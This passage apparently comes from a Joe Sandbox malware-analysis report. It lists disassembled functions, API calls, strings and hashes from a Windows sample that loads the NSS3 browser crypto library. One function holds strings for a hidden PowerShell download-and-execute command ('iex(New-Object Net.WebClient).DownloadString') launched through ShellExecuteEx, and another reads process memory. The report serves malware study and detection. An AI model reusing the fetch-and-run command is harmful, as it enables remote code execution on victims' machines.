Instruction ID: 94999ad7c30c39ccc3504d9b57b94f1d283778a936f0e27a360a0c3d645bee15
Opcode Fuzzy Hash: f0d2d87df8a4b1a185843c0442d41b530cbdaaf541ea38b763626d5765eec56b
Instruction Fuzzy Hash: B901E1FA904602AFEF044F19FC10D597A72BB022787194338E824477E2E722ED24C783

Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CD1A

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__amsg_exit.LIBCMT ref: 0041CD3A
__lock.LIBCMT ref: 0041CD4A
InterlockedDecrement.KERNEL32(?), ref: 0041CD67
free.MSVCRT ref: 0041CD7A
InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 587787c82373052a7d5fa8fe452c31414abe52f9f3dbef213e064f6ca36087fd
Instruction ID: 32de29d8b535b7c23b45bc0c103f374cb0be9b6e688679b13724543d4f472475
Opcode Fuzzy Hash: 587787c82373052a7d5fa8fe452c31414abe52f9f3dbef213e064f6ca36087fd
Instruction Fuzzy Hash: 8F018835A816219BC721AB6AACC57DFBB60BF04714F55412BE80467790C73CA9C1CBDD

Function 004193F0 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(02D258C8,00000000,00000000,?,00409F71,00000000,02D258C8,00000000), ref: 004193FC
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,02D258C8,02D258C8,?,00409F71,00000000,02D258C8), ref: 00419420
lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02D258C8), ref: 00419437
wsprintfA.USER32 ref: 00419457

Strings

C:\Users\user\Desktop\, xrefs: 0041941B, 00419450, 00419460
%s%s, xrefs: 00419445

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-3088838541
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96

Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041719F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD

Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85

VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333

Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078

Strings

@, xrefs: 00417226

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5

Function 6CF8FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CF8FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF8FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CF8FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CF8FDDE

Part of subcall function 6CF98800: TlsGetValue.KERNEL32(?,6CFA085A,00000000,?,6CF48369,?), ref: 6CF98821
Part of subcall function 6CF98800: TlsGetValue.KERNEL32(?,?,6CFA085A,00000000,?,6CF48369,?), ref: 6CF9883D
Part of subcall function 6CF98800: EnterCriticalSection.KERNEL32(?,?,?,6CFA085A,00000000,?,6CF48369,?), ref: 6CF98856
Part of subcall function 6CF98800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CF98887
Part of subcall function 6CF98800: PR_Unlock.NSS3(?,?,?,?,6CFA085A,00000000,?,6CF48369,?), ref: 6CF98899

Strings

pkcs11:, xrefs: 6CF8FC4F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 60d239b80162c79c838c052700ea8492e6a80c4d0fe02e0bf3c39563885eceaa
Instruction ID: 130f1249ac71b46f19d9be495dc4c946fb14ff827b4dc7f58e0b78d6e844b596
Opcode Fuzzy Hash: 60d239b80162c79c838c052700ea8492e6a80c4d0fe02e0bf3c39563885eceaa
Instruction Fuzzy Hash: 4551D473B161129FEF509F65DC40B9A3775AF41358F190025DE059BB52EB30EA04CBA2

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6
zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95

Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
<, xrefs: 00412F89
')", xrefs: 00412F03
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 6fa33c5b16d5f6225e408fb615931b911d7425545cf3a9b72a40f9e20f088bc1
Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
Opcode Fuzzy Hash: 6fa33c5b16d5f6225e408fb615931b911d7425545cf3a9b72a40f9e20f088bc1
Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99

Function 6CECBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6CECBE02

Part of subcall function 6CFF9C40: memcmp.VCRUNTIME140(?,00000000,6CECC52B), ref: 6CFF9D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CECBE9F

Strings

%s at line %d of [%.10s], xrefs: 6CECBE98
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECBE89
database corruption, xrefs: 6CECBE93

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 0e1a41d6d6475537131f520161ba598099543a279423c907eae23087fdf616d5
Instruction ID: 5c325ff4ead03af71fe7e958cfb0d7a277e7eeead8211112f6e4488b5f3eef08
Opcode Fuzzy Hash: 0e1a41d6d6475537131f520161ba598099543a279423c907eae23087fdf616d5
Instruction Fuzzy Hash: 78313631F0825D8FC700CF698A94B6BBBB1AF42B14B298554EE681B681D371EC01C7D2

Function 6CF30DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CF30BDE), ref: 6CF30DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CF30BDE), ref: 6CF30DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CF30BDE), ref: 6CF30DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CF30BDE), ref: 6CF30E32

Strings

%s incr => %d (find lib), xrefs: 6CF30E2D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: f402eb798ecd1d10bcb4037edddf31ca54f343e686d9dc5aef60ede1db631030
Instruction ID: dd88a3a3c3f5089dd13c728b7295c1501e0c9747ac38ccddf6a9927203da03fe
Opcode Fuzzy Hash: f402eb798ecd1d10bcb4037edddf31ca54f343e686d9dc5aef60ede1db631030
Instruction Fuzzy Hash: 6501D472B00624AFE6248F25DC45F1B73ACDB45A09B05446EEE4AD3682E7A2EC5487E1

Function 6CED9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CED9CF2
LeaveCriticalSection.KERNEL32(?), ref: 6CED9D45
EnterCriticalSection.KERNEL32(?), ref: 6CED9D8B
LeaveCriticalSection.KERNEL32(?), ref: 6CED9DDE

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: aa1bda602d2f02ee999155dca535b1f067c0d0b6ef0e0ceb74ea1b86f9e1187f
Instruction ID: 806fb63acad18bc0279b59c8440c0a481d40c1ea8970dba7fc896c809c9fafac
Opcode Fuzzy Hash: aa1bda602d2f02ee999155dca535b1f067c0d0b6ef0e0ceb74ea1b86f9e1187f
Instruction Fuzzy Hash: 40A19E756015009BDB089F24EDA9B6E3771BB87319F29012CE5168BB41DF3AB887CB43

Function 6CFEDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CFEDD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CFEDE77

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: be4a094ef1415184b90ae433d0efa5c4aa0647bb50112be92a17b7f3d969d591
Instruction ID: 5435a3612b4f2d95774756d292f438f78fda50da7a5ca37aeaed4bc85caa876b
Opcode Fuzzy Hash: be4a094ef1415184b90ae433d0efa5c4aa0647bb50112be92a17b7f3d969d591
Instruction Fuzzy Hash: 08716571A00318DFDB20CF9AC58478AB7B4BF89718F29816DD9596FB02D770A942CF90

Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410FE8
strtok_s.MSVCRT ref: 0041112D

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 9b877138154a67bb675f83d8929484f116c009822a60c7170a5b0242d1619af2
Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
Opcode Fuzzy Hash: 9b877138154a67bb675f83d8929484f116c009822a60c7170a5b0242d1619af2
Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95

Function 6CF3EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF3EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CF3EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CF3EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF3EEEB
free.MOZGLUE(?), ref: 6CF3EEF6

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: f87f387416a46126476cd31b0db202b04657ea9498bf74095d5cad72170d9428
Instruction ID: bf0ad392f71c7834b3b3b668f2a2a46b23be6e4167db42c8e56745d0ca60213c
Opcode Fuzzy Hash: f87f387416a46126476cd31b0db202b04657ea9498bf74095d5cad72170d9428
Instruction Fuzzy Hash: 2431F572900621BBE7209F29CC40BAB7BB4FF46704F151629E95E87A91D731EC94CBD1

Function 6CF81EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CF66295,?,00000000,00000000,00000001,6CF82653,?), ref: 6CF81ECB

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

TlsGetValue.KERNEL32(?,00000001,?,?,6CF66295,?,00000000,00000000,00000001,6CF82653,?), ref: 6CF81EF1
EnterCriticalSection.KERNEL32(?), ref: 6CF81F01
PR_SetError.NSS3(00000000,00000000), ref: 6CF81F39

